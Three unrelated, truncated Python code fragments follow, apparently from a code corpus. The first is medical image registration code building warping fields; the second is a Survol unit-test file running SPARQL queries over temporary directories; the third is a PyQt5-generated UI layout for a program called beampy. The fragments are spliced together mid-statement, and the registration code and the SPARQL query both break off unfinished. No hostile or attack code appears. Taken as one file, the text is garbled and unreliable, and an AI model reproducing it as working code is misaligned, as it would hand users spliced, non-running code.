dest1d_min) / 2 mean_src_y = (src1d_max + src1d_min) / 2 # Tx = (dest1d_max + dest1d_min)/2 - (src1d_max + src1d_min)/2 Sy = (dest1d_max - dest1d_min + 1) / float(src1d_max - src1d_min + 1) # apply forward transformation (in pixel space) # below: only for debugging purpose # coord_src2d_scaleX = np.copy(coord_src2d) # need to use np.copy to avoid copying pointer # coord_src2d_scaleX[:, 0] = (coord_src2d[:, 0] - mean_src) * Sx + mean_dest # coord_init_pix_scaleY = np.copy(coord_init_pix) # need to use np.copy to avoid copying pointer # coord_init_pix_scaleY[:, 0] = (coord_init_pix[:, 0] - mean_src ) * Sx + mean_dest range_x = list(range(ix * ny, ix * ny + nx)) coord_init_pix_scaleY[range_x, 1] = (coord_init_pix[range_x, 1] - mean_src_y) * Sy + mean_dest_y coord_init_pix_scaleYinv[range_x, 1] = (coord_init_pix[range_x, 1] - mean_dest_y) / float(Sy) + mean_src_y # apply transformation to image col_scaleYinv = np.reshape(coord_init_pix_scaleYinv[:, 1], [nx, ny]) src2d_scaleXY = warp(src2d, np.array([row_scaleXinv, col_scaleYinv]), order=1) # regularize Y warping fields from skimage.filters import gaussian col_scaleY = np.reshape(coord_init_pix_scaleY[:, 1], [nx, ny]) col_scaleYsmooth = gaussian(col_scaleY, smoothWarpXY) col_scaleYinvsmooth = gaussian(col_scaleYinv, smoothWarpXY) # apply smoothed transformation to image src2d_scaleXYsmooth = warp(src2d, np.array([row_scaleXinv, col_scaleYinvsmooth]), order=1) # reshape warping field as 1d coord_init_pix_scaleY[:, 1] = col_scaleYsmooth.ravel() coord_init_pix_scaleYinv[:, 1] = col_scaleYinvsmooth.ravel() # display if verbose == 2: # FIG 1 plt.figure(figsize=(15, 3)) # plot #1 ax = plt.subplot(141) plt.imshow(np.swapaxes(src2d, 1, 0), cmap=plt.cm.gray, interpolation='none') plt.hold(True) # add other layer plt.imshow(np.swapaxes(dest2d, 1, 0), cmap=plt.cm.copper, interpolation='none', alpha=0.5) plt.title('src') plt.xlabel('x') plt.ylabel('y') plt.xlim(mean_dest_x - 15, mean_dest_x + 15) plt.ylim(mean_dest_y - 15, 
mean_dest_y + 15) ax.grid(True, color='w') # plot #2 ax = plt.subplot(142) plt.imshow(np.swapaxes(src2d_scaleX, 1, 0), cmap=plt.cm.gray, interpolation='none') plt.hold(True) # add other layer plt.imshow(np.swapaxes(dest2d, 1, 0), cmap=plt.cm.copper, interpolation='none', alpha=0.5) plt.title('src_scaleX') plt.xlabel('x') plt.ylabel('y') plt.xlim(mean_dest_x - 15, mean_dest_x + 15) plt.ylim(mean_dest_y - 15, mean_dest_y + 15) ax.grid(True, color='w') # plot #3 ax = plt.subplot(143) plt.imshow(np.swapaxes(src2d_scaleXY, 1, 0), cmap=plt.cm.gray, interpolation='none') plt.hold(True) # add other layer plt.imshow(np.swapaxes(dest2d, 1, 0), cmap=plt.cm.copper, interpolation='none', alpha=0.5) plt.title('src_scaleXY') plt.xlabel('x') plt.ylabel('y') plt.xlim(mean_dest_x - 15, mean_dest_x + 15) plt.ylim(mean_dest_y - 15, mean_dest_y + 15) ax.grid(True, color='w') # plot #4 ax = plt.subplot(144) plt.imshow(np.swapaxes(src2d_scaleXYsmooth, 1, 0), cmap=plt.cm.gray, interpolation='none') plt.hold(True) # add other layer plt.imshow(np.swapaxes(dest2d, 1, 0), cmap=plt.cm.copper, interpolation='none', alpha=0.5) plt.title('src_scaleXYsmooth (s=' + str(smoothWarpXY) + ')') plt.xlabel('x') plt.ylabel('y') plt.xlim(mean_dest_x - 15, mean_dest_x + 15) plt.ylim(mean_dest_y - 15, mean_dest_y + 15) ax.grid(True, color='w') # save figure plt.savefig(os.path.join(path_qc, 'register2d_columnwise_image_z' + str(iz) + '.png')) plt.close() # ============================================================ # CALCULATE TRANSFORMATIONS # ============================================================ # calculate forward transformation (in physical space) coord_init_phy_scaleX = np.array(im_dest.transfo_pix2phys(coord_init_pix_scaleX)) coord_init_phy_scaleY = np.array(im_dest.transfo_pix2phys(coord_init_pix_scaleY)) # calculate inverse transformation (in physical space) coord_init_phy_scaleXinv = np.array(im_src.transfo_pix2phys(coord_init_pix_scaleXinv)) coord_init_phy_scaleYinv = 
np.array(im_src.transfo_pix2phys(coord_init_pix_scaleYinv)) # compute displacement per pixel in destination space (for forward warping field) warp_x[:, :, iz] = np.array([coord_init_phy_scaleXinv[i, 0] - coord_init_phy[i, 0] for i in range(nx * ny)]).reshape((nx, ny)) warp_y[:, :, iz] = np.array([coord_init_phy_scaleYinv[i, 1] - coord_init_phy[i, 1] for i in range(nx * ny)]).reshape((nx, ny)) # compute displacement per pixel in source space (for inverse warping field) warp_inv_x[:, :, iz] = np.array([coord_init_phy_scaleX[i, 0] - coord_init_phy[i, 0] for i in range(nx * ny)]).reshape((nx, ny)) warp_inv_y[:, :, iz] = np.array([coord_init_phy_scaleY[i, 1] - coord_init_phy[i, 1] for i in range(nx * ny)]).reshape((nx, ny)) # Generate forward warping field (defined in destination space) generate_warping_field(fname_dest, warp_x, warp_y, fname_warp, verbose) # Generate inverse warping field (defined in source space) generate_warping_field(fname_src, warp_inv_x, warp_inv_y, fname_warp_inv, verbose) def register2d(fname_src, fname_dest, fname_mask='', fname_warp='warp_forward.nii.gz', fname_warp_inv='warp_inverse.nii.gz', paramreg=Paramreg(step='0', type='im', algo='Translation', metric='MI', iter='5', shrink='1', smooth='0', gradStep='0.5'), ants_registration_params={'rigid': '', 'affine': '', 'compositeaffine': '', 'similarity': '', 'translation': '', 'bspline': ',10', 'gaussiandisplacementfield': ',3,0', 'bsplinedisplacementfield': ',5,10', 'syn': ',3,0', 'bsplinesyn': ',1,3'}, verbose=0): """Slice-by-slice registration of two images. We first split the 3D images into 2D images (and the mask if inputted). Then we register slices of the two images that physically correspond to one another looking at the physical origin of each image. The images can be of different sizes but the destination image must be smaller thant the input image. We do that using antsRegistration in 2D. Once this has been done for each slices, we gather the results and return them. 
Algorithms implemented: translation, rigid, affine, syn and BsplineSyn. N.B.: If the mask is inputted, it must also be 3D and it must be in the same space as the destination image. input: fname_source: name of moving image (type: string) fname_dest: name of fixed image (type: string) mask[optional]: name of mask file (type: string) (parameter -x of antsRegistration) fname_warp: name of output 3d forward warping field fname_warp_inv: name of output 3d inverse warping field paramreg[optional]: parameters of antsRegistration (type: Paramreg class from sct_register_multimodal) ants_registration_params[optional]: specific algorithm's parameters for antsRegistration (type: dictionary) output: if algo==translation: x_displacement: list of translation along x axis for each slice (type: list) y_displacement: list of translation along y axis for each slice (type: list) if algo==rigid: x_displacement: list of translation along x axis for each slice (type: list) y_displacement: list of translation along y axis for each slice (type: list) theta_rotation: list of rotation angle in radian (and in ITK's coordinate system) for each slice (type: list) if algo==affine or algo==syn or algo==bsplinesyn: creation of two 3D warping fields (forward and inverse) that are the concatenations of the slice-by-slice warps. """ # set metricSize if paramreg.metric == 'MI': metricSize = '32' # corresponds to number of bins else: metricSize = '4' # corresponds to radius (for CC, MeanSquares...) # Get image dimensions and retrieve nz sct.printv('\nGet image dimensions of destination image...', verbose) nx, ny, nz, nt, px, py, pz, pt = Image(fname_dest).dim sct.printv('.. matrix size: ' + str(nx) + ' x ' + str(ny) + ' x ' + str(nz), verbose) sct.printv('.. 
voxel size: ' + str(px) + 'mm x ' + str(py) + 'mm x ' + str(pz) + 'mm', verbose) # Split input volume along z sct.printv('\nSplit input volume...', verbose) from sct_image import split_data im_src = Image('src.nii') split_source_list = split_data(im_src, 2) for im in split_source_list: im.save() # Split destination volume along z sct.printv('\nSplit destination volume...', verbose) im_dest = Image('dest.nii') split_dest_list = split_data(im_dest, 2) for im in split_dest_list: im.save() # Split mask volume along z if fname_mask != '': sct.printv('\nSplit mask volume...', verbose) im_mask = Image('mask.nii.gz') split_mask_list = split_data(im_mask, 2) for im in split_mask_list: im.save() # coord_origin_dest = im_dest.transfo_pix2phys([[0,0,0]]) # coord_origin_input = im_src.transfo_pix2phys([[0,0,0]]) # coord_diff_origin = (np.asarray(coord_origin_dest[0]) - np.asarray(coord_origin_input[0])).tolist() # [x_o, y_o, z_o] = [coord_diff_origin[0] * 1.0/px, coord_diff_origin[1] * 1.0/py, coord_diff_origin[2] * 1.0/pz] # initialization if paramreg.algo in ['Translation']: x_displacement = [0 for i in range(nz)] y_displacement = [0 for i in range(nz)] theta_rotation
<filename>tests/test_sparql_custom_evals_survol.py
#!/usr/bin/env python

from __future__ import print_function

import os
import sys
import subprocess
import tempfile
import rdflib
import unittest
import psutil

from init import *

update_test_path()

import lib_util
import lib_kbase
import lib_sparql_custom_evals

# Namespace under which Survol publishes its CIM-style classes and predicates.
survol_namespace = lib_kbase.LDT


class SurvolStore(rdflib.plugins.memory.IOMemory):
    """The derived class of a plain rdflib store helps debugging."""

    def __init__(self, configuration=None, identifier=None):
        super(SurvolStore, self).__init__(configuration)

    def triples(self, t_triple, context=None):
        # Pass-through override: a convenient hook to trace which triple
        # patterns rdflib asks the store for (see commented prints below).
        t_subject, t_predicate, t_object = t_triple
        # print("triples vals=",t_subject, t_predicate, t_object)
        # print("triples typs=",type(t_subject), type(t_predicate), type(t_object))
        """
        triples vals= None http://www.w3.org/1999/02/22-rdf-syntax-ns#type http://primhillcomputer.com/ontologies/CIM_Directory
        triples typs= <type 'NoneType'> <class 'rdflib.term.URIRef'> <class 'rdflib.term.URIRef'>
        """
        return super(SurvolStore, self).triples((t_subject, t_predicate, t_object), context)


def _create_graph():
    """The return value behaves exactly like a rdflib Graph plus ease of debugging if needed"""
    survol_store = SurvolStore()
    rdflib_graph = rdflib.Graph(survol_store)
    return rdflib_graph


# This displays the correct case for a filename. This is necessary because
# the variable sys.executable is not correctly cased with pytest on Windows.
# "c:\python27\python.exe" into "C:/Python27/python.exe"
sys_executable_case = lib_util.standardized_file_path(sys.executable)

################################################################################
# TODO: If the class is not statically defined, use WMI or WBEM,
# without using SeeAlso.
# If a property or an associator is not defined is a custom property,
# use WMI or WBEM.
#
# Use rdfs:seeAlso for scripts: It just loads the content.
# Since seeAlso is an attribute, the parameters are passed along.
# ?url_file rdf:type survol:CIM_DataFile .
# ?url_file rdfs:seeAlso "survol:CIM_DataFile/python_properties" .
# ?url_file survol:CIM_ProcessExecutable ?url_proc .
#
# Other query examples.
# {'url_proc': {'CSName': 'RCHATEAU-HP', 'Name': 'python.exe', 'ProcessId': str(CurrentPid),
#               'Handle': str(CurrentPid),
#               'OSCreationClassName': 'Win32_OperatingSystem',
#               '__class__': 'CIM_Process',
#               'rdf-schema#isDefinedBy': 'WMI',
#               'ParentProcessId': str(CurrentParentPid),
#               'Caption': 'python.exe',
#               'CSCreationClassName': 'Win32_ComputerSystem', 'Description': 'python.exe',
#               'ExecutablePath': 'C:\\\\Python27\\\\python.exe',
#               'CreationClassName': 'Win32_Process', },
#  'url_file': {'CSName': 'RCHATEAU-HP',
#               'FSCreationClassName': 'Win32_FileSystem',
#               'Description': 'c:\\\\python27\\\\python.exe', '__class__': 'CIM_DataFile',
#               'rdf-schema#isDefinedBy': 'WMI',
#               'Name': 'c:\\\\python27\\\\python.exe',
#               'FileType': 'Application', 'Drive': 'c:', 'Extension': 'exe',
#               'Caption': 'c:\\\\python27\\\\python.exe',
#               'CSCreationClassName': 'Win32_ComputerSystem', 'FileName': 'python',
#               'CreationClassName': 'CIM_LogicalFile'}},
# ],
################################################################################

# Utilities functions.

# Sparql does not easily accept strings with backslashes. Therefore, it is simpler
# to enforce a plain slash as file path separator for Windows.
_temp_dir_path = lib_util.standardized_file_path(tempfile.gettempdir())


def _create_temp_file():
    """Create an empty temporary file and return its slash-separated path.

    The name embeds the current pid, so repeated calls from one process
    return the same path and simply truncate the existing file.
    """
    tmp_filename = "survol_temp_file_%d.tmp" % os.getpid()
    tmp_pathname = os.path.join(_temp_dir_path, tmp_filename)
    # Context manager instead of manual open()/close(): the handle is released
    # even if an exception is raised while the file is open.
    with open(tmp_pathname, "w"):
        pass
    return tmp_pathname


# This generates an unique directory name.
_unique_string = "%d_%f" % (os.getpid(), time.time())


def _print_subprocesses(proc_id, depth=0):
    # Recursively prints the subprocess tree of proc_id, indented by depth.
    for one_proc in psutil.Process(proc_id).children(recursive=False):
        print(" " * depth, one_proc.pid)
        _print_subprocesses(one_proc.pid, depth+1)


class CUSTOM_EVALS_Survol_Base_Test(unittest.TestCase):
    """
    This sets the CUSTOM_EVALS callback for all derived tests.
    It is mandatory to define which sets of classes are used to create CIM objects.
    There might be several representations, with an overlap of plain CIM classes:
    - WMI: Classes and instances are listed with WMI calls exclusively. This is for Windows.
    - WBEM: Classes and instances are listed with WBEM and pywbem calls exclusively. This is for Linux.
    - Survol: Which derived from WMI or WBEM and adds it owns classes
      which are not represented yet in CIM, WMI or WBEM.
    """
    def setUp(self):
        # add function directly, normally we would use setuptools and entry_points
        rdflib.plugins.sparql.CUSTOM_EVALS['custom_eval_function'] = lib_sparql_custom_evals.custom_eval_function

    def tearDown(self):
        # Unregister so later, unrelated rdflib queries are not affected.
        if 'custom_eval_function' in rdflib.plugins.sparql.CUSTOM_EVALS:
            del rdflib.plugins.sparql.CUSTOM_EVALS['custom_eval_function']


class CUSTOM_EVALS_Low_Level_Test(CUSTOM_EVALS_Survol_Base_Test):
    """ This tests low-level and internal features. """

    def _one_return_tst(self, num_results_expected, return_variables):
        # https://docs.python.org/3/library/itertools.html#itertools.combinations
        # itertools.product
        def make_var(input_var):
            """
            This receives input data for testing the enujmeration of all combinations
            of variables and values.
            It just transforms the variable names into rdflib variable nodes,
            and values into rdflib literals.
            This is needed to test the library function whch calculates the combinations.
            :param input_var: This is a dictionary whose keys are tuples of strings representing Sparql variables.
            :return:
            """
            return_dict = {}
            for variables_tuple, values_list in input_var.items():
                var_node = tuple(rdflib.term.Variable(variable_name) for variable_name in variables_tuple)
                values_nodes = [
                    tuple(rdflib.term.Literal(one_value) for one_value in one_value_tuple)
                    for one_value_tuple in values_list]
                return_dict[var_node] = values_nodes
            return return_dict

        input_as_variables = make_var(return_variables)
        results_iter = lib_sparql_custom_evals.product_variables_lists(input_as_variables)
        print("return_variables=", return_variables)
        results_list = list(results_iter)
        for one_resu in results_list:
            print("one_resu=", one_resu)
        # Only the cardinality of the cartesian product is checked here.
        num_results_actual = len(results_list)
        self.assertEqual(num_results_actual, num_results_expected)

    def test_prod_variables(self):
        """
        This tests the enumeration of all possible combination of values
        or a set of input variables, that is, the cartesians product
        of Sparql variables and their values.
        This loops on all possible combinations.
        """
        # Expected count is the product of the per-variable value counts.
        self._one_return_tst(1, {('a',): [('a1',)], ('b',): [('b1',)], ('c',): [('c1',)], })
        self._one_return_tst(2, {('a',): [('a1',)], ('b',): [('b1',), ('b2',)], ('c',): [('c1',)], })
        self._one_return_tst(6, {('a',): [('a1',)], ('b',): [('b1',), ('b2',)], ('c',): [('c1',), ('c2',), ('c3',)], })
        self._one_return_tst(2, {('a', 'aa'): [('a1', 'aa1')], ('b',): [('b1',), ('b2',)], ('c',): [('c1',)], })
        self._one_return_tst(4, {('a', 'aa'): [('a1', 'aa1'), ('a2', 'aa2')], ('b',): [('b1',), ('b2',)], ('c',): [('c1',)], })


class CUSTOM_EVALS_Basic_Sparql_Queries_Test(CUSTOM_EVALS_Survol_Base_Test):

    def test_sparql_parent(self):
        # Looks up the directory containing a freshly-created temporary file.
        rdflib_graph = _create_graph()

        # C:/Windows/temp\\survol_temp_file_12532.tmp'
        tmp_pathname = _create_temp_file()
        # Sparql does not accept backslashes.
        tmp_pathname = lib_util.standardized_file_path(tmp_pathname)

        sparql_query = """
            PREFIX survol: <%s>
            SELECT ?directory_name WHERE {
                ?url_directory a survol:CIM_Directory .
                ?url_datafile a survol:CIM_DataFile .
?url_directory survol:CIM_DirectoryContainsFile ?url_datafile . ?url_directory survol:Name ?directory_name . ?url_datafile survol:Name "%s" . } """ % (survol_namespace, tmp_pathname) query_result = list(rdflib_graph.query(sparql_query)) self.assertEqual(str(query_result[0][0]), _temp_dir_path) print("Result=", query_result) def test_sparql_children_files(self): rdflib_graph = _create_graph() # C:/Windows/temp\\survol_temp_file_12532.tmp' tmp_pathname = lib_util.standardized_file_path(_create_temp_file()) sparql_query = """ PREFIX survol: <%s> SELECT ?datafile_name WHERE { ?url_directory a survol:CIM_Directory . ?url_datafile a survol:CIM_DataFile . ?url_directory survol:CIM_DirectoryContainsFile ?url_datafile . ?url_datafile survol:Name ?datafile_name . ?url_directory survol:Name "%s" . } """ % (survol_namespace, _temp_dir_path) query_result = list(rdflib_graph.query(sparql_query)) print("Result=", query_result) self.assertTrue(tmp_pathname in [str(node[0]) for node in query_result]) def test_sparql_grandparent(self): rdflib_graph = _create_graph() # C:/Windows/temp\\survol_temp_file_12532.tmp' tmp_pathname = _create_temp_file() # Sparql does not accept backslashes. tmp_pathname = lib_util.standardized_file_path(tmp_pathname) sparql_query = """ PREFIX survol: <%s> SELECT ?grandparent_name WHERE { ?url_grandparent a survol:CIM_Directory . ?url_directory a survol:CIM_Directory . ?url_datafile a survol:CIM_DataFile . ?url_grandparent survol:CIM_DirectoryContainsFile ?url_directory . ?url_directory survol:CIM_DirectoryContainsFile ?url_datafile . ?url_grandparent survol:Name ?grandparent_name . ?url_datafile survol:Name "%s" . 
} """ % (survol_namespace, tmp_pathname) query_result = list(rdflib_graph.query(sparql_query)) print("Result=", query_result) temp_dir_path_dir = lib_util.standardized_file_path(os.path.dirname(_temp_dir_path)) self.assertEqual(str(query_result[0][0]), temp_dir_path_dir) def _create_files_tree(self, prefix, files_tree): def _create_files_tree_aux(root_dir, files_tree): os.makedirs(root_dir) for key, value in files_tree.items(): one_path = os.path.join(root_dir, key) if value: assert isinstance(value, dict) _create_files_tree_aux(one_path, value) else: open(one_path, "w").close() root_dir = os.path.join(_temp_dir_path, "survol_temp_%s_%s" % (prefix, _unique_string)) _create_files_tree_aux(root_dir, files_tree) return root_dir def test_sparql_grandchildren_files(self): rdflib_graph = _create_graph() files_tree = { "dir_1" : { "dir_1_1" : { "file_1_1_1.txt": None}}, "dir_2": {"dir_2_1": {"file_2_1_1.txt": None, "file_2_1_2.txt": None, "file_2_1_3.txt": None}}, "file_3.txt": None, "dir_4": {"dir_4_1": {"file_4_1_1.txt": None, "dir_4_1_1_1": {"file_4_1_1_1_1.txt": None, }, "file_4_2.txt":None}}, "dir_5": {"file_5_1.txt": None}, } test_root_dir = self._create_files_tree("tst_grand_children", files_tree) test_root_dir = lib_util.standardized_file_path(test_root_dir) sparql_query = """ PREFIX survol: <%s> SELECT ?datafile_name WHERE { ?url_directory_0 a survol:CIM_Directory . ?url_directory_0 survol:Name "%s" . ?url_directory_0 survol:CIM_DirectoryContainsFile ?url_directory_1 . ?url_directory_1 a survol:CIM_Directory . ?url_directory_1 survol:Name ?directory_name_1 . ?url_directory_1 survol:CIM_DirectoryContainsFile ?url_directory_2 . ?url_directory_2 a survol:CIM_Directory . ?url_directory_2 survol:Name ?directory_name_2 . ?url_directory_2 survol:CIM_DirectoryContainsFile ?url_datafile . ?url_datafile a survol:CIM_DataFile . ?url_datafile survol:Name ?datafile_name . 
} """ % (survol_namespace, test_root_dir) query_result = list(rdflib_graph.query(sparql_query)) def dir_depth(dir_path): return len(os.path.normpath(dir_path).split(os.path.sep)) expected_files = [] for root_dir, dir_lists, files_list in os.walk(test_root_dir): print("root=", root_dir, dir_depth(root_dir), dir_depth(test_root_dir)) if dir_depth(root_dir) != dir_depth(test_root_dir) + 2: continue print("root_dir=", root_dir, dir_depth(root_dir)) for one_file_name in files_list: sub_path_name = lib_util.standardized_file_path(os.path.join(root_dir, one_file_name)) expected_files.append(sub_path_name) expected_files = sorted(expected_files) actual_files = sorted([str(one_path_url[0]) for one_path_url in query_result]) print("actual_files =", actual_files) print("expected_files=", expected_files) for x in zip(actual_files, expected_files): print(x) print("") self.assertEqual(actual_files, expected_files) def test_sparql_grandchildren_directories(self): rdflib_graph = _create_graph() sparql_query = """ PREFIX survol: <%s> SELECT ?subdirectory_name WHERE { ?url_grandparent a survol:CIM_Directory . ?url_directory a survol:CIM_Directory . ?url_subdirectory a survol:CIM_Directory . ?url_grandparent survol:CIM_DirectoryContainsFile ?url_directory . ?url_directory survol:CIM_DirectoryContainsFile ?url_subdirectory . ?url_grandparent survol:Name "%s" . ?url_subdirectory survol:Name ?subdirectory_name . 
} """ % (survol_namespace, _temp_dir_path) query_result = list(rdflib_graph.query(sparql_query)) expected_dirs = set() for root_dir, dir_lists, files_list in os.walk(_temp_dir_path): if lib_util.standardized_file_path(os.path.dirname(root_dir)) == _temp_dir_path: for one_file_name in dir_lists: sub_path_name = lib_util.standardized_file_path(os.path.join(root_dir, one_file_name)) expected_dirs.add(sub_path_name) actual_dirs = set([str(one_path_url[0]) for one_path_url in query_result]) print("actual_dirs=", actual_dirs) print("expected_dirs=", expected_dirs) self.assertEqual(actual_dirs, expected_dirs) def test_sparql_subdirectory_2(self): """Tests that a second-level directory is detected. """ rdflib_graph = _create_graph() dir_path = os.path.join(_temp_dir_path, "survol_temp_dir%s_1" % _unique_string, "survol_temp_dir%s_2" % _unique_string) os.makedirs(dir_path) dir_path = lib_util.standardized_file_path(dir_path) sparql_query = """ PREFIX survol: <%s> SELECT ?subdirectory_name WHERE { ?url_directory_0 a survol:CIM_Directory . ?url_directory_1 a survol:CIM_Directory . ?url_directory_2 a survol:CIM_Directory . ?url_directory_0 survol:CIM_DirectoryContainsFile ?url_directory_1 . ?url_directory_1 survol:CIM_DirectoryContainsFile ?url_directory_2 . ?url_directory_0 survol:Name "%s" . ?url_directory_2 survol:Name ?subdirectory_name . } """ % (survol_namespace, _temp_dir_path) query_result = list(rdflib_graph.query(sparql_query)) print("dir_path=", dir_path) actual_files = set([str(one_path_url[0]) for one_path_url in query_result]) print("actual_files=", actual_files) self.assertTrue(dir_path in actual_files) def test_sparql_subdirectory_3(self): """Tests that a third-level directory is detected. 
""" rdflib_graph = _create_graph() dir_path = os.path.join( _temp_dir_path, "survol_temp_dir%s_1" % _unique_string, "survol_temp_dir%s_2" % _unique_string, "survol_temp_dir%s_3" % _unique_string) os.makedirs(dir_path) # Must be called if the directory exists, otherwise, on Windows, it can be correctly capitalized. dir_path = lib_util.standardized_file_path(dir_path) print("dir_path=", dir_path) sparql_query = """ PREFIX
<filename>beampy/interface.py<gh_stars>10-100 # -*- coding: utf-8 -*- # Form implementation generated from reading ui file 'interface.ui' # # Created by: PyQt5 UI code generator 5.15.1 # # WARNING: Any manual changes made to this file will be lost when pyuic5 is # run again. Do not edit this file unless you know what you are doing. from PyQt5 import QtCore, QtGui, QtWidgets class Ui_MainWindow(object): def setupUi(self, MainWindow): MainWindow.setObjectName("MainWindow") MainWindow.resize(1144, 1019) MainWindow.setMinimumSize(QtCore.QSize(800, 935)) self.centralwidget = QtWidgets.QWidget(MainWindow) self.centralwidget.setObjectName("centralwidget") self.gridLayout = QtWidgets.QGridLayout(self.centralwidget) self.gridLayout.setObjectName("gridLayout") self.frame_file_data = QtWidgets.QFrame(self.centralwidget) self.frame_file_data.setFrameShape(QtWidgets.QFrame.NoFrame) self.frame_file_data.setFrameShadow(QtWidgets.QFrame.Raised) self.frame_file_data.setObjectName("frame_file_data") self.verticalLayout = QtWidgets.QVBoxLayout(self.frame_file_data) self.verticalLayout.setObjectName("verticalLayout") self.tabWidget_main = QtWidgets.QTabWidget(self.frame_file_data) self.tabWidget_main.setObjectName("tabWidget_main") self.tabWidget_guide = QtWidgets.QWidget() self.tabWidget_guide.setObjectName("tabWidget_guide") self.horizontalLayout_2 = QtWidgets.QHBoxLayout(self.tabWidget_guide) self.horizontalLayout_2.setObjectName("horizontalLayout_2") self.verticalLayout_guide = QtWidgets.QVBoxLayout() self.verticalLayout_guide.setObjectName("verticalLayout_guide") self.label_window_parameters = QtWidgets.QLabel(self.tabWidget_guide) self.label_window_parameters.setMinimumSize(QtCore.QSize(0, 62)) self.label_window_parameters.setMaximumSize(QtCore.QSize(16777215, 30)) self.label_window_parameters.setObjectName("label_window_parameters") self.verticalLayout_guide.addWidget(self.label_window_parameters) self.frame_window = QtWidgets.QFrame(self.tabWidget_guide) 
self.frame_window.setMinimumSize(QtCore.QSize(200, 0)) self.frame_window.setMaximumSize(QtCore.QSize(350, 16777215)) self.frame_window.setFrameShape(QtWidgets.QFrame.Box) self.frame_window.setFrameShadow(QtWidgets.QFrame.Raised) self.frame_window.setObjectName("frame_window") self.formLayout_10 = QtWidgets.QFormLayout(self.frame_window) self.formLayout_10.setObjectName("formLayout_10") self.label_length = QtWidgets.QLabel(self.frame_window) self.label_length.setAccessibleDescription("") self.label_length.setOpenExternalLinks(False) self.label_length.setObjectName("label_length") self.formLayout_10.setWidget(0, QtWidgets.QFormLayout.LabelRole, self.label_length) self.doubleSpinBox_length_z = QtWidgets.QDoubleSpinBox(self.frame_window) self.doubleSpinBox_length_z.setCorrectionMode(QtWidgets.QAbstractSpinBox.CorrectToNearestValue) self.doubleSpinBox_length_z.setDecimals(3) self.doubleSpinBox_length_z.setMinimum(0.001) self.doubleSpinBox_length_z.setMaximum(100000.0) self.doubleSpinBox_length_z.setProperty("value", 10000.0) self.doubleSpinBox_length_z.setObjectName("doubleSpinBox_length_z") self.formLayout_10.setWidget(0, QtWidgets.QFormLayout.FieldRole, self.doubleSpinBox_length_z) self.label_dist_z = QtWidgets.QLabel(self.frame_window) self.label_dist_z.setObjectName("label_dist_z") self.formLayout_10.setWidget(1, QtWidgets.QFormLayout.LabelRole, self.label_dist_z) self.doubleSpinBox_dist_z = QtWidgets.QDoubleSpinBox(self.frame_window) self.doubleSpinBox_dist_z.setCorrectionMode(QtWidgets.QAbstractSpinBox.CorrectToNearestValue) self.doubleSpinBox_dist_z.setDecimals(3) self.doubleSpinBox_dist_z.setMinimum(0.001) self.doubleSpinBox_dist_z.setMaximum(100000.0) self.doubleSpinBox_dist_z.setProperty("value", 1.0) self.doubleSpinBox_dist_z.setObjectName("doubleSpinBox_dist_z") self.formLayout_10.setWidget(1, QtWidgets.QFormLayout.FieldRole, self.doubleSpinBox_dist_z) self.label_nbr_z_disp = QtWidgets.QLabel(self.frame_window) 
self.label_nbr_z_disp.setObjectName("label_nbr_z_disp") self.formLayout_10.setWidget(2, QtWidgets.QFormLayout.LabelRole, self.label_nbr_z_disp) self.spinBox_nbr_z_disp = QtWidgets.QSpinBox(self.frame_window) self.spinBox_nbr_z_disp.setCorrectionMode(QtWidgets.QAbstractSpinBox.CorrectToNearestValue) self.spinBox_nbr_z_disp.setMinimum(1) self.spinBox_nbr_z_disp.setMaximum(10000) self.spinBox_nbr_z_disp.setProperty("value", 200) self.spinBox_nbr_z_disp.setDisplayIntegerBase(10) self.spinBox_nbr_z_disp.setObjectName("spinBox_nbr_z_disp") self.formLayout_10.setWidget(2, QtWidgets.QFormLayout.FieldRole, self.spinBox_nbr_z_disp) self.label_length_x = QtWidgets.QLabel(self.frame_window) self.label_length_x.setObjectName("label_length_x") self.formLayout_10.setWidget(3, QtWidgets.QFormLayout.LabelRole, self.label_length_x) self.doubleSpinBox_length_x = QtWidgets.QDoubleSpinBox(self.frame_window) self.doubleSpinBox_length_x.setCorrectionMode(QtWidgets.QAbstractSpinBox.CorrectToNearestValue) self.doubleSpinBox_length_x.setDecimals(3) self.doubleSpinBox_length_x.setMinimum(0.001) self.doubleSpinBox_length_x.setMaximum(10000.0) self.doubleSpinBox_length_x.setProperty("value", 1000.0) self.doubleSpinBox_length_x.setObjectName("doubleSpinBox_length_x") self.formLayout_10.setWidget(3, QtWidgets.QFormLayout.FieldRole, self.doubleSpinBox_length_x) self.label_dist_x = QtWidgets.QLabel(self.frame_window) self.label_dist_x.setObjectName("label_dist_x") self.formLayout_10.setWidget(4, QtWidgets.QFormLayout.LabelRole, self.label_dist_x) self.doubleSpinBox_dist_x = QtWidgets.QDoubleSpinBox(self.frame_window) self.doubleSpinBox_dist_x.setCorrectionMode(QtWidgets.QAbstractSpinBox.CorrectToNearestValue) self.doubleSpinBox_dist_x.setDecimals(3) self.doubleSpinBox_dist_x.setMinimum(0.001) self.doubleSpinBox_dist_x.setMaximum(100.0) self.doubleSpinBox_dist_x.setProperty("value", 0.2) self.doubleSpinBox_dist_x.setObjectName("doubleSpinBox_dist_x") self.formLayout_10.setWidget(4, 
QtWidgets.QFormLayout.FieldRole, self.doubleSpinBox_dist_x) self.label_n = QtWidgets.QLabel(self.frame_window) self.label_n.setObjectName("label_n") self.formLayout_10.setWidget(5, QtWidgets.QFormLayout.LabelRole, self.label_n) self.doubleSpinBox_n = QtWidgets.QDoubleSpinBox(self.frame_window) self.doubleSpinBox_n.setCorrectionMode(QtWidgets.QAbstractSpinBox.CorrectToNearestValue) self.doubleSpinBox_n.setDecimals(6) self.doubleSpinBox_n.setMinimum(1.0) self.doubleSpinBox_n.setMaximum(1000.0) self.doubleSpinBox_n.setSingleStep(0.1) self.doubleSpinBox_n.setProperty("value", 2.14) self.doubleSpinBox_n.setObjectName("doubleSpinBox_n") self.formLayout_10.setWidget(5, QtWidgets.QFormLayout.FieldRole, self.doubleSpinBox_n) self.doubleSpinBox_lo = QtWidgets.QDoubleSpinBox(self.frame_window) self.doubleSpinBox_lo.setCorrectionMode(QtWidgets.QAbstractSpinBox.CorrectToNearestValue) self.doubleSpinBox_lo.setDecimals(4) self.doubleSpinBox_lo.setMinimum(0.01) self.doubleSpinBox_lo.setMaximum(100.0) self.doubleSpinBox_lo.setProperty("value", 1.55) self.doubleSpinBox_lo.setObjectName("doubleSpinBox_lo") self.formLayout_10.setWidget(6, QtWidgets.QFormLayout.FieldRole, self.doubleSpinBox_lo) self.label_lo = QtWidgets.QLabel(self.frame_window) self.label_lo.setObjectName("label_lo") self.formLayout_10.setWidget(6, QtWidgets.QFormLayout.LabelRole, self.label_lo) 